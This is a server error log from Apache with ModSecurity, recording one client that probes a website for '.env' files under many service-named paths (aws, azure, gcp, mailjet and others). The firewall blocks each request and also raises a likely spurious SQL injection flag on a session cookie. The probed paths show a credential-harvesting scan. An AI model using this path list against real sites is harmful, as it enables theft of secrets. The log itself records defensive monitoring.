[Mon May 11 14:10:28.719557 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mailjet/.env"] [unique_id "agHHNOJEyNRN152ArORztwAAAFI"]
[Mon May 11 14:10:28.719937 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mailjet/.env"] [unique_id "agHHNOJEyNRN152ArORztwAAAFI"]
[Mon May 11 14:10:28.720127 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mailjet/.env"] [unique_id "agHHNOJEyNRN152ArORztwAAAFI"]
[Mon May 11 14:10:28.720379 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mailjet/.env"] [unique_id "agHHNOJEyNRN152ArORztwAAAFI"]
[Mon May 11 14:10:28.989472 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/brevo/.env"] [unique_id "agHHNOJEyNRN152ArORzuQAAAFI"]
[Mon May 11 14:10:28.989845 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/brevo/.env"] [unique_id "agHHNOJEyNRN152ArORzuQAAAFI"]
[Mon May 11 14:10:28.990030 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/brevo/.env"] [unique_id "agHHNOJEyNRN152ArORzuQAAAFI"]
[Mon May 11 14:10:28.990265 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/brevo/.env"] [unique_id "agHHNOJEyNRN152ArORzuQAAAFI"]
[Mon May 11 14:10:29.253628 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/transactional/.env"] [unique_id "agHHNeJEyNRN152ArORzugAAAFI"]
[Mon May 11 14:10:29.254064 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/transactional/.env"] [unique_id "agHHNeJEyNRN152ArORzugAAAFI"]
[Mon May 11 14:10:29.254258 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/transactional/.env"] [unique_id "agHHNeJEyNRN152ArORzugAAAFI"]
[Mon May 11 14:10:29.254540 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/transactional/.env"] [unique_id "agHHNeJEyNRN152ArORzugAAAFI"]
[Mon May 11 14:10:29.633275 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/bulk/.env"] [unique_id "agHHNeJEyNRN152ArORzuwAAAFI"]
[Mon May 11 14:10:29.633656 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/bulk/.env"] [unique_id "agHHNeJEyNRN152ArORzuwAAAFI"]
[Mon May 11 14:10:29.633841 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/bulk/.env"] [unique_id "agHHNeJEyNRN152ArORzuwAAAFI"]
[Mon May 11 14:10:29.634077 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/bulk/.env"] [unique_id "agHHNeJEyNRN152ArORzuwAAAFI"]
[Mon May 11 14:10:29.928633 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/aws/.env"] [unique_id "agHHNeJEyNRN152ArORzvAAAAFI"]
[Mon May 11 14:10:29.928996 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/aws/.env"] [unique_id "agHHNeJEyNRN152ArORzvAAAAFI"]
[Mon May 11 14:10:29.929187 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/aws/.env"] [unique_id "agHHNeJEyNRN152ArORzvAAAAFI"]
[Mon May 11 14:10:29.929433 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/aws/.env"] [unique_id "agHHNeJEyNRN152ArORzvAAAAFI"]
[Mon May 11 14:10:30.059868 2026] [core:error] [pid 1319953:tid 1319968] [client 52.242.216.199:21715] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:30.059903 2026] [core:error] [pid 1319953:tid 1319968] [client 52.242.216.199:21715] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:30.211983 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/azure/.env"] [unique_id "agHHNuJEyNRN152ArORzvgAAAFI"]
[Mon May 11 14:10:30.212366 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/azure/.env"] [unique_id "agHHNuJEyNRN152ArORzvgAAAFI"]
[Mon May 11 14:10:30.212551 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/azure/.env"] [unique_id "agHHNuJEyNRN152ArORzvgAAAFI"]
[Mon May 11 14:10:30.212781 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/azure/.env"] [unique_id "agHHNuJEyNRN152ArORzvgAAAFI"]
[Mon May 11 14:10:30.476652 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/gcp/.env"] [unique_id "agHHNuJEyNRN152ArORzvwAAAFI"]
[Mon May 11 14:10:30.477041 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/gcp/.env"] [unique_id "agHHNuJEyNRN152ArORzvwAAAFI"]
[Mon May 11 14:10:30.477240 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/gcp/.env"] [unique_id "agHHNuJEyNRN152ArORzvwAAAFI"]
[Mon May 11 14:10:30.477482 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/gcp/.env"] [unique_id "agHHNuJEyNRN152ArORzvwAAAFI"]
[Mon May 11 14:10:30.747327 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cloud/.env"] [unique_id "agHHNuJEyNRN152ArORzwAAAAFI"]
[Mon May 11 14:10:30.747725 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cloud/.env"] [unique_id "agHHNuJEyNRN152ArORzwAAAAFI"]
[Mon May 11 14:10:30.747938 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cloud/.env"] [unique_id "agHHNuJEyNRN152ArORzwAAAAFI"]
[Mon May 11 14:10:30.748202 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cloud/.env"] [unique_id "agHHNuJEyNRN152ArORzwAAAAFI"]
[Mon May 11 14:10:31.027507 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/infrastructure/.env"] [unique_id "agHHN-JEyNRN152ArORzwQAAAFI"]
[Mon May 11 14:10:31.027891 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/infrastructure/.env"] [unique_id "agHHN-JEyNRN152ArORzwQAAAFI"]
[Mon May 11 14:10:31.028073 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/infrastructure/.env"] [unique_id "agHHN-JEyNRN152ArORzwQAAAFI"]
